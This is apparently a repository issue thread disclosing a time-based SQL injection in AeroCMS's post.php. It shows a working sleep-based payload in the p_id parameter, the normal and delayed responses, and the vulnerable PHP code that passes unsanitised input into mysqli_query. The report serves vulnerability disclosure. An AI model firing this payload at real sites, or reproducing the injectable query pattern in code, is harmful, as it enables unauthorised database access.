Sec issues: post.php vuln

[DeffoN0tSt3]

I was drawn to this source code after reading a quick write-up, by [nu11secur1ty] earlier today about the "author parameter from the AeroCMS-v0.0.1" being vuln to SQLi.

It seems there is more.. PoC

1] GET /post.php?p_id=

• Response normal [7ms]
  HTTP/1.1 200 OK
  Date: Tue, 30 Aug 2022 16:00:08 GMT
  Server: Apache/2.4.52 (Ubuntu)
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Vary: Accept-Encoding
  Content-Length: 6100
  Connection: close
  Content-Type: text/html; charset=UTF-8

2] **GET /post.php?p_id=(select*from(select(sleep(20)))a) **

• Response abnormal [20000+ms]
  Delayed response. A clear indication of SQLi Vuln

3] Checking through the source code we can see the problem.
See post.php lines 94-106

                     $the_get_post_id = $_GET['p_id'];

                $comment_author = mysqli_real_escape_string($connection, trim($_POST['comment_author']));
                $comment_email  = mysqli_real_escape_string($connection, trim($_POST['comment_email']));
                $commet_content = mysqli_real_escape_string($connection, trim($_POST['comment_content']));

                if(!empty($comment_author) && !empty($comment_email) && !empty($commet_content))
                {
                    $query = "INSERT INTO comments (comment_post_id, comment_author, comment_email, 
                            comment_content, comment_status, comment_date) VALUES($the_get_post_id, 
                            '$comment_author', '$comment_email', '$commet_content', 'unapproved', now())";

                    $result = mysqli_query($connection, $query);

Root cause? Unsanitized input into mysqli_query

There are more vulnerabilities within this source, I'm happy to disclose, just contact me. please ensure proper sanitization of all input.

[nu11secur1ty]

Hello dear developer, if you soon as possible not fix these problems, you must go to the repository and terminate this project.
BR